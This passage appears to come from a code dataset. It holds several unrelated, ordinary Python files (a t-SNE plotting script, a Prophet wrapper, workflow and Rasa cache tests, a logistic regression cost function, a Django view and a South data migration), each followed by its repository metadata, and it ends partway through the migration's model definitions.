0.131, 0.132, 0.133, 0.135, 0.136, 0.138, 0.139, 0.140, 0.142, 0.143,
0.145, 0.146, 0.148, 0.149, 0.151, 0.153, 0.154, 0.156, 0.157, 0.159,
0.161, 0.162, 0.164, 0.166, 0.167, 0.169, 0.171, 0.173, 0.174, 0.176,
0.178, 0.180, 0.182, 0.183, 0.185, 0.187, 0.189, 0.191, 0.193, 0.195,
0.197, 0.199, 0.201, 0.203, 0.205, 0.207, 0.209, 0.211, 0.214, 0.216,
0.218, 0.220, 0.222, 0.224, 0.227, 0.229, 0.231, 0.234, 0.236, 0.238,
0.241, 0.243, 0.245, 0.248, 0.250, 0.253, 0.255, 0.258, 0.260, 0.263,
0.265, 0.268, 0.270, 0.273, 0.276, 0.278, 0.281, 0.284, 0.286, 0.289,
0.292, 0.295, 0.297, 0.300, 0.303, 0.306, 0.309, 0.312, 0.315, 0.318,
0.320, 0.323, 0.326, 0.329, 0.332, 0.335, 0.339, 0.342, 0.345, 0.348,
0.351, 0.354, 0.357, ... (long run of numeric array values elided) ..., 0.001, 0.000]}
| 68.20354
| 7,828
| 0.613364
|
38e6aa47de618d25463d747676e024d7387f4e53
| 4,520
|
py
|
Python
|
tsne-cluster.py
|
eszabo12/clusterGAN
|
e91d1fe5c5a46512d55890902b51aab4ae8c98b1
|
[
"MIT"
] | null | null | null |
tsne-cluster.py
|
eszabo12/clusterGAN
|
e91d1fe5c5a46512d55890902b51aab4ae8c98b1
|
[
"MIT"
] | null | null | null |
tsne-cluster.py
|
eszabo12/clusterGAN
|
e91d1fe5c5a46512d55890902b51aab4ae8c98b1
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
try:
import argparse
import os
import numpy as np
import sys
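    # Print numpy arrays in full rather than truncating them to a summary.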
np.set_printoptions(threshold=sys.maxsize)
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import pandas as pd
from torch.autograd import Variable
from torch.autograd import grad as torch_grad
import torch
import torchvision
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import DataLoader
from torchvision import datasets
import torchvision.transforms as transforms
from torchvision.utils import save_image
from itertools import chain as ichain
from clusgan.definitions import DATASETS_DIR, RUNS_DIR
from clusgan.models import Generator_CNN, Encoder_CNN, Discriminator_CNN
from clusgan.datasets import get_dataloader, dataset_list
from sklearn.manifold import TSNE
except ImportError as e:
    print(e)
    raise
def main():
global args
parser = argparse.ArgumentParser(description="TSNE generation script")
parser.add_argument("-r", "--run_dir", dest="run_dir", help="Training run directory")
parser.add_argument("-p", "--perplexity", dest="perplexity", default=-1, type=int, help="TSNE perplexity")
parser.add_argument("-n", "--n_samples", dest="n_samples", default=100, type=int, help="Number of samples")
args = parser.parse_args()
# TSNE setup
n_samples = args.n_samples
perplexity = args.perplexity
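    # A negative perplexity is a sentinel meaning "use the PCA-initialized default below".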
# Directory structure for this run
run_dir = args.run_dir.rstrip("/")
run_name = run_dir.split(os.sep)[-1]
dataset_name = run_dir.split(os.sep)[-2]
run_dir = os.path.join(RUNS_DIR, dataset_name, run_name)
data_dir = os.path.join(DATASETS_DIR, dataset_name)
imgs_dir = os.path.join(run_dir, 'images')
models_dir = os.path.join(run_dir, 'models')
# Latent space info
train_df = pd.read_csv('%s/training_details.csv'%(run_dir))
latent_dim = train_df['latent_dim'][0]
n_c = train_df['n_classes'][0]
    cuda = torch.cuda.is_available()
# Load encoder model
encoder = Encoder_CNN(latent_dim, n_c)
enc_figname = os.path.join(models_dir, encoder.name + '.pth.tar')
encoder.load_state_dict(torch.load(enc_figname))
    if cuda:
        encoder.cuda()
encoder.eval()
# Configure data loader
dataloader = get_dataloader(dataset_name=dataset_name, data_dir=data_dir, batch_size=n_samples, train_set=False)
    Tensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor
# Load TSNE
    if perplexity < 0:
tsne = TSNE(n_components=2, verbose=1, init='pca', random_state=0)
fig_title = "PCA Initialization"
figname = os.path.join(run_dir, 'tsne-pca.png')
else:
tsne = TSNE(n_components=2, verbose=1, perplexity=perplexity, n_iter=300)
fig_title = "Perplexity = $%d$"%perplexity
figname = os.path.join(run_dir, 'tsne-plex%i.png'%perplexity)
# Get full batch for encoding
imgs, labels = next(iter(dataloader))
c_imgs = Variable(imgs.type(Tensor), requires_grad=False)
# Encode real images
enc_zn, enc_zc, enc_zc_logits = encoder(c_imgs)
# Stack latent space encoding
enc = np.hstack((enc_zn.cpu().detach().numpy(), enc_zc_logits.cpu().detach().numpy()))
#enc = np.hstack((enc_zn.cpu().detach().numpy(), enc_zc.cpu().detach().numpy()))
# Cluster with TSNE
tsne_enc = tsne.fit_transform(enc)
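    # tsne_enc is an (n_samples, 2) array of 2-D embedding coordinates.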
# Convert to numpy for indexing purposes
labels = labels.cpu().data.numpy()
# Color and marker for each true class
colors = cm.rainbow(np.linspace(0, 1, n_c))
markers = matplotlib.markers.MarkerStyle.filled_markers
# Save TSNE figure to file
fig, ax = plt.subplots(figsize=(16,10))
for iclass in range(0, n_c):
# Get indices for each class
idxs = labels==iclass
# Scatter those points in tsne dims
ax.scatter(tsne_enc[idxs, 0],
tsne_enc[idxs, 1],
marker=markers[iclass],
c=colors[iclass],
edgecolor=None,
label=r'$%i$'%iclass)
ax.set_title(r'%s'%fig_title, fontsize=24)
ax.set_xlabel(r'$X^{\mathrm{tSNE}}_1$', fontsize=18)
ax.set_ylabel(r'$X^{\mathrm{tSNE}}_2$', fontsize=18)
plt.legend(title=r'Class', loc='best', numpoints=1, fontsize=16)
plt.tight_layout()
fig.savefig(figname)
if __name__ == "__main__":
main()
| 33.731343
| 116
| 0.67146
|
d7a7d0cc208fba6cc0acdc238e1b2db91abb7b42
| 658
|
py
|
Python
|
core/src/main/python/python_runner/algo/prophet/impl.py
|
zhangjun0x01/Alink
|
c1cd3380bed29a4be4eb058a7462213869c02387
|
[
"Apache-2.0"
] | 3,301
|
2018-10-01T16:30:44.000Z
|
2022-03-30T08:07:16.000Z
|
core/src/main/python/python_runner/algo/prophet/impl.py
|
zhangjun0x01/Alink
|
c1cd3380bed29a4be4eb058a7462213869c02387
|
[
"Apache-2.0"
] | 206
|
2019-11-27T14:04:42.000Z
|
2022-03-28T08:02:05.000Z
|
core/src/main/python/python_runner/algo/prophet/impl.py
|
zhangjun0x01/Alink
|
c1cd3380bed29a4be4eb058a7462213869c02387
|
[
"Apache-2.0"
] | 765
|
2018-10-09T02:02:19.000Z
|
2022-03-31T12:06:21.000Z
|
import pandas as pd
from prophet import Prophet
from prophet.serialize import model_to_json
class PyProphetCalc:
def setCollector(self, collector):
self._collector = collector
def calc(self, arg):
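        # Each row of arg is expected to be a (ds, y) pair: a timestamp and an observed value.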
ds_array = []
y_array = []
for row in arg:
ds_array.append(row[0])
y_array.append(row[1])
list_of_tuples = list(zip(ds_array, y_array))
df = pd.DataFrame(list_of_tuples, columns=['ds', 'y'])
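        # Fit Prophet with its default settings; no extra seasonalities or regressors are configured.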
m = Prophet()
m.fit(df)
self._collector.collectRow(model_to_json(m))
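    # py4j bridge declaration: exposes this class to the Java side as a PyMIMOCalcHandle implementation.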
class Java:
implements = ["com.alibaba.alink.common.pyrunner.PyMIMOCalcHandle"]
| 26.32
| 75
| 0.62614
|
1803bc72674f2a9f648af9141f1ff78837b4b8fe
| 1,387
|
py
|
Python
|
shells/generic_terraform_service/tests/integration_tests/helper_services/service_attributes_factory.py
|
oleksandr-r-q/CloudShell-Terraform-Shell
|
8d331cf8eebeae794e4e73a3c70af8064bafa434
|
[
"Apache-2.0"
] | 4
|
2021-11-26T05:41:05.000Z
|
2022-03-11T20:01:40.000Z
|
shells/generic_terraform_service/tests/integration_tests/helper_services/service_attributes_factory.py
|
oleksandr-r-q/CloudShell-Terraform-Shell
|
8d331cf8eebeae794e4e73a3c70af8064bafa434
|
[
"Apache-2.0"
] | 10
|
2021-07-14T05:19:54.000Z
|
2021-11-02T05:37:48.000Z
|
shells/generic_terraform_service/tests/integration_tests/helper_services/service_attributes_factory.py
|
oleksandr-r-q/CloudShell-Terraform-Shell
|
8d331cf8eebeae794e4e73a3c70af8064bafa434
|
[
"Apache-2.0"
] | 1
|
2021-11-01T07:46:59.000Z
|
2021-11-01T07:46:59.000Z
|
from cloudshell.api.cloudshell_api import NameValuePair
from tests.integration_tests.constants import SHELL_NAME, ATTRIBUTE_NAMES
class ServiceAttributesFactory:
@staticmethod
    def create_empty_attributes() -> list[NameValuePair]:
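        # One NameValuePair per known service attribute, each initialized to an empty string.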
attributes = [
NameValuePair(Name=f"{SHELL_NAME}.{ATTRIBUTE_NAMES.REMOTE_STATE_PROVIDER}", Value=""),
NameValuePair(Name=f"{SHELL_NAME}.{ATTRIBUTE_NAMES.BRANCH}", Value=""),
NameValuePair(Name=f"{SHELL_NAME}.{ATTRIBUTE_NAMES.CUSTOM_TAGS}", Value=""),
NameValuePair(Name=f"{SHELL_NAME}.{ATTRIBUTE_NAMES.APPLY_TAGS}", Value=""),
NameValuePair(Name=f"{SHELL_NAME}.{ATTRIBUTE_NAMES.GITHUB_TERRAFORM_MODULE_URL}", Value=""),
NameValuePair(Name=f"{SHELL_NAME}.{ATTRIBUTE_NAMES.TERRAFORM_VERSION}", Value=""),
NameValuePair(Name=f"{SHELL_NAME}.{ATTRIBUTE_NAMES.GITHUB_TOKEN}", Value=""),
NameValuePair(Name=f"{SHELL_NAME}.{ATTRIBUTE_NAMES.CLOUD_PROVIDER}", Value=""),
NameValuePair(Name=f"{SHELL_NAME}.{ATTRIBUTE_NAMES.UUID}", Value=""),
NameValuePair(Name=f"{SHELL_NAME}.{ATTRIBUTE_NAMES.TF_OUTPUTS}", Value=""),
NameValuePair(Name=f"{SHELL_NAME}.{ATTRIBUTE_NAMES.TF_SENSIITVE_OUTPUTS}", Value=""),
NameValuePair(Name=f"{SHELL_NAME}.{ATTRIBUTE_NAMES.TF_INPUTS}", Value="")
]
return attributes
| 57.791667
| 104
| 0.687815
|
d21696b5a1d5b049e2a2165e902d9c669ed430b2
| 2,034
|
py
|
Python
|
orquesta/tests/unit/conducting/native/test_workflow_error_handling.py
|
batk0/orquesta
|
f03f3f2f3820bf111a9277f4f6c5d6c83a89d004
|
[
"Apache-2.0"
] | null | null | null |
orquesta/tests/unit/conducting/native/test_workflow_error_handling.py
|
batk0/orquesta
|
f03f3f2f3820bf111a9277f4f6c5d6c83a89d004
|
[
"Apache-2.0"
] | null | null | null |
orquesta/tests/unit/conducting/native/test_workflow_error_handling.py
|
batk0/orquesta
|
f03f3f2f3820bf111a9277f4f6c5d6c83a89d004
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from orquesta import states
from orquesta.tests.unit.conducting.native import base
class WorkflowErrorHandlingConductorTest(base.OrchestraWorkflowConductorTest):
def test_error_log_fail(self):
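        # task1 fails, the error-handling route runs the log task, and the workflow ends in fail.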
wf_name = 'error-log-fail'
expected_task_seq = [
'task1',
'log',
'fail'
]
mock_states = [
states.FAILED, # task1
states.SUCCEEDED # log
]
mock_results = [
'All your base are belong to us!', # task1
'All your base are belong to us!' # log
]
self.assert_spec_inspection(wf_name)
self.assert_conducting_sequences(
wf_name,
expected_task_seq,
mock_states=mock_states,
mock_results=mock_results,
expected_workflow_state=states.FAILED
)
def test_error_concurrent_log_fail(self):
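        # In the concurrent variant, task1's failure routes straight to fail; the log task never runs.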
wf_name = 'error-log-fail-concurrent'
expected_task_seq = [
'task1',
'fail'
]
mock_states = [
states.FAILED # task1
]
mock_results = [
'All your base are belong to us!' # task1
]
self.assert_spec_inspection(wf_name)
self.assert_conducting_sequences(
wf_name,
expected_task_seq,
mock_states=mock_states,
mock_results=mock_results,
expected_workflow_state=states.FAILED
)
| 27.863014
| 78
| 0.613078
|
06b5a158be61fb81917af52864f225e1f64dfb05
| 421
|
py
|
Python
|
notebooks/Ex3-Neural-Networks/ex3-py/lrCostFunction.py
|
jesussantana/Machine-Learning-Stanford-University
|
7ee8527d8a2df43c674757e060d1c7ccad2926a4
|
[
"MIT"
] | 1
|
2021-06-02T15:27:58.000Z
|
2021-06-02T15:27:58.000Z
|
notebooks/Ex3-Neural-Networks/ex3-py/lrCostFunction.py
|
jesussantana/Machine-Learning-Stanford-University
|
7ee8527d8a2df43c674757e060d1c7ccad2926a4
|
[
"MIT"
] | null | null | null |
notebooks/Ex3-Neural-Networks/ex3-py/lrCostFunction.py
|
jesussantana/Machine-Learning-Stanford-University
|
7ee8527d8a2df43c674757e060d1c7ccad2926a4
|
[
"MIT"
] | null | null | null |
import numpy as np
from sigmoid import sigmoid
def lrCostFunction(theta, X, y, lamda):
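    # Regularized logistic-regression cost and gradient; the bias term theta[0] is not penalized.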
theta = theta.reshape((theta.size, 1))
m = y.size
h = sigmoid(X.dot(theta))
J = np.mean(-y * np.log(h) - (1 - y) * np.log(1 - h))
J += np.square(theta[1:]).sum() * lamda / 2 / m
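    # Gradient: the data term for all parameters, then the L2 penalty added for theta[1:] only.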
grad = X.T.dot(h - y) / m
grad[1:] = grad[1:] + lamda * theta[1:] / m
return J, grad.ravel()
| 21.05
| 58
| 0.513064
|
7f5d0758ce5e2e3109c2a53edfd6feaa0316cec0
| 154
|
py
|
Python
|
2019/08/03/The Basics of Django ListView/listviewexample/listviewexample/example/views.py
|
kenjitagawa/youtube_video_code
|
ef3c48b9e136b3745d10395d94be64cb0a1f1c97
|
[
"Unlicense"
] | 492
|
2019-06-25T12:54:31.000Z
|
2022-03-30T12:38:28.000Z
|
2019/08/03/The Basics of Django ListView/listviewexample/listviewexample/example/views.py
|
kenjitagawa/youtube_video_code
|
ef3c48b9e136b3745d10395d94be64cb0a1f1c97
|
[
"Unlicense"
] | 23
|
2019-10-01T01:36:08.000Z
|
2022-02-10T12:46:16.000Z
|
2019/08/03/The Basics of Django ListView/listviewexample/listviewexample/example/views.py
|
kenjitagawa/youtube_video_code
|
ef3c48b9e136b3745d10395d94be64cb0a1f1c97
|
[
"Unlicense"
] | 1,734
|
2019-06-03T06:25:13.000Z
|
2022-03-31T23:57:53.000Z
|
from django.shortcuts import render
from django.views.generic import ListView
from .models import Member
class MemberList(ListView):
model = Member
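    # With no template_name or context_object_name set, Django renders
    # example/member_list.html and exposes the queryset as "object_list"
    # (alias "member_list") in the template context.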
| 19.25
| 41
| 0.798701
|
b82b4bc841a56c1d63cf16cc78312f6e64430412
| 3,639
|
py
|
Python
|
tests/engine/training/test_hooks.py
|
praneethgb/rasa
|
5bf227f165d0b041a367d2c0bbf712ebb6a54792
|
[
"Apache-2.0"
] | 8
|
2020-09-16T17:22:13.000Z
|
2022-02-01T00:11:30.000Z
|
tests/engine/training/test_hooks.py
|
praneethgb/rasa
|
5bf227f165d0b041a367d2c0bbf712ebb6a54792
|
[
"Apache-2.0"
] | 216
|
2020-09-20T13:05:58.000Z
|
2022-03-28T12:10:24.000Z
|
tests/engine/training/test_hooks.py
|
praneethgb/rasa
|
5bf227f165d0b041a367d2c0bbf712ebb6a54792
|
[
"Apache-2.0"
] | 1
|
2022-02-01T18:23:23.000Z
|
2022-02-01T18:23:23.000Z
|
from rasa.engine.caching import TrainingCache
from rasa.engine.graph import ExecutionContext, GraphNode, GraphSchema, SchemaNode
from rasa.engine.storage.storage import ModelStorage
from rasa.engine.training import fingerprinting
from rasa.engine.training.components import PrecomputedValueProvider
from rasa.engine.training.hooks import TrainingHook
from tests.engine.graph_components_test_classes import (
CacheableComponent,
CacheableText,
)
def test_training_hook_saves_to_cache(
default_model_storage: ModelStorage,
temp_cache: TrainingCache,
default_training_hook: TrainingHook,
):
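    # Running the node once should store both a fingerprint mapping and the cacheable output.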
# We need an execution context so the hook can determine the class of the graph
# component
execution_context = ExecutionContext(
GraphSchema(
{
"hello": SchemaNode(
needs={},
constructor_name="create",
fn="run",
config={},
uses=CacheableComponent,
)
}
),
"1",
)
node = GraphNode(
node_name="hello",
component_class=CacheableComponent,
constructor_name="create",
component_config={},
fn_name="run",
inputs={"suffix": "input_node"},
eager=False,
model_storage=default_model_storage,
resource=None,
execution_context=execution_context,
hooks=[default_training_hook],
)
node(("input_node", "Joe"))
# This is the same key that the hook will generate
fingerprint_key = fingerprinting.calculate_fingerprint_key(
graph_component_class=CacheableComponent,
config={"prefix": "Hello "},
inputs={"suffix": "Joe"},
)
output_fingerprint_key = temp_cache.get_cached_output_fingerprint(fingerprint_key)
assert output_fingerprint_key
cached_result = temp_cache.get_cached_result(
output_fingerprint_key=output_fingerprint_key,
model_storage=default_model_storage,
node_name="hello",
)
assert isinstance(cached_result, CacheableText)
assert cached_result.text == "Hello Joe"
def test_training_hook_does_not_cache_cached_component(
default_model_storage: ModelStorage,
temp_cache: TrainingCache,
default_training_hook: TrainingHook,
):
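    # PrecomputedValueProvider just replays already-cached output, so the hook must not cache it again.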
# We need an execution context so the hook can determine the class of the graph
# component
execution_context = ExecutionContext(
GraphSchema(
{
"hello": SchemaNode(
needs={},
constructor_name="create",
fn="run",
config={},
uses=PrecomputedValueProvider,
)
}
),
"1",
)
node = GraphNode(
node_name="hello",
component_class=PrecomputedValueProvider,
constructor_name="create",
component_config={"output": CacheableText("hi")},
fn_name="get_value",
inputs={},
eager=False,
model_storage=default_model_storage,
resource=None,
execution_context=execution_context,
hooks=[default_training_hook],
)
node(("input_node", "Joe"))
# This is the same key that the hook will generate
fingerprint_key = fingerprinting.calculate_fingerprint_key(
graph_component_class=PrecomputedValueProvider,
config={"output": CacheableText("hi")},
inputs={},
)
# The hook should not cache the output of a PrecomputedValueProvider
assert not temp_cache.get_cached_output_fingerprint(fingerprint_key)
| 31.643478
| 86
| 0.646057
|
f3d24b8fb4d8bc05bb6392f1c03891faa2043558
| 33,508
|
py
|
Python
|
scielomanager/journalmanager/migrations/0016_fix_nulls_in_init_num.py
|
patymori/scielo-manager
|
0945f377376de8ef0ada83c35b4e2312062cdf45
|
[
"BSD-2-Clause"
] | 8
|
2015-07-07T03:09:16.000Z
|
2019-03-16T04:46:32.000Z
|
scielomanager/journalmanager/migrations/0016_fix_nulls_in_init_num.py
|
DalavanCloud/scielo-manager
|
0945f377376de8ef0ada83c35b4e2312062cdf45
|
[
"BSD-2-Clause"
] | 245
|
2015-01-14T13:29:58.000Z
|
2022-01-13T00:48:44.000Z
|
scielomanager/journalmanager/migrations/0016_fix_nulls_in_init_num.py
|
DalavanCloud/scielo-manager
|
0945f377376de8ef0ada83c35b4e2312062cdf45
|
[
"BSD-2-Clause"
] | 5
|
2016-02-19T15:47:08.000Z
|
2019-03-16T04:46:20.000Z
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
"Write your forwards methods here."
# Note: Don't use "from appname.models import ModelName".
# Use orm.ModelName to refer to models in this application,
# and orm['appname.ModelName'] for models in other applications.
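        # Bulk-replace NULL init_num values with empty strings (reversed in backwards()).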
orm.Journal.objects.filter(init_num=None).update(init_num='')
def backwards(self, orm):
"Write your backwards methods here."
orm.Journal.objects.filter(init_num='').update(init_num=None)
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'journalmanager.aheadpressrelease': {
'Meta': {'object_name': 'AheadPressRelease', '_ormbases': ['journalmanager.PressRelease']},
'journal': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'press_releases'", 'to': "orm['journalmanager.Journal']"}),
'pressrelease_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['journalmanager.PressRelease']", 'unique': 'True', 'primary_key': 'True'})
},
'journalmanager.article': {
'Meta': {'object_name': 'Article'},
'aid': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'article_type': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'articles_linkage_is_pending': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now_add': 'True', 'blank': 'True'}),
'doi': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '2048', 'db_index': 'True'}),
'domain_key': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '2048', 'db_index': 'False'}),
'es_is_dirty': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'es_updated_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_aop': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_visible': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'issn_epub': ('django.db.models.fields.CharField', [], {'max_length': '9', 'db_index': 'True'}),
'issn_ppub': ('django.db.models.fields.CharField', [], {'max_length': '9', 'db_index': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'articles'", 'null': 'True', 'to': "orm['journalmanager.Issue']"}),
'journal': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'articles'", 'null': 'True', 'to': "orm['journalmanager.Journal']"}),
'journal_title': ('django.db.models.fields.CharField', [], {'max_length': '512', 'db_index': 'True'}),
'related_articles': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['journalmanager.Article']", 'null': 'True', 'through': "orm['journalmanager.ArticlesLinkage']", 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'xml': ('scielomanager.custom_fields.XMLSPSField', [], {}),
'xml_version': ('django.db.models.fields.CharField', [], {'max_length': '9'})
},
'journalmanager.articleslinkage': {
'Meta': {'object_name': 'ArticlesLinkage'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link_to': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'referrers'", 'to': "orm['journalmanager.Article']"}),
'link_type': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'referrer': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'links_to'", 'to': "orm['journalmanager.Article']"})
},
'journalmanager.collection': {
'Meta': {'ordering': "['name']", 'object_name': 'Collection'},
'acronym': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '16', 'blank': 'True'}),
'address': ('django.db.models.fields.TextField', [], {}),
'address_complement': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'address_number': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'collection': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'user_collection'", 'to': "orm['auth.User']", 'through': "orm['journalmanager.UserCollections']", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'fax': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}),
'name_slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'zip_code': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True', 'blank': 'True'})
},
'journalmanager.institution': {
'Meta': {'ordering': "['name']", 'object_name': 'Institution'},
'acronym': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '16', 'blank': 'True'}),
'address': ('django.db.models.fields.TextField', [], {}),
'address_complement': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'address_number': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'cel': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'complement': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'fax': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_trashed': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256', 'db_index': 'True'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'zip_code': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True', 'blank': 'True'})
},
'journalmanager.issue': {
'Meta': {'ordering': "('created', 'id')", 'object_name': 'Issue'},
'cover': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'ctrl_vocabulary': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'editorial_standard': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_marked_up': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_trashed': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'journal': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.Journal']"}),
'label': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '64', 'null': 'True', 'blank': 'True'}),
'number': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'order': ('django.db.models.fields.IntegerField', [], {'blank': 'True'}),
'publication_end_month': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'publication_start_month': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'publication_year': ('django.db.models.fields.IntegerField', [], {}),
'section': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['journalmanager.Section']", 'symmetrical': 'False', 'blank': 'True'}),
'spe_text': ('django.db.models.fields.CharField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'suppl_text': ('django.db.models.fields.CharField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'total_documents': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'regular'", 'max_length': '15'}),
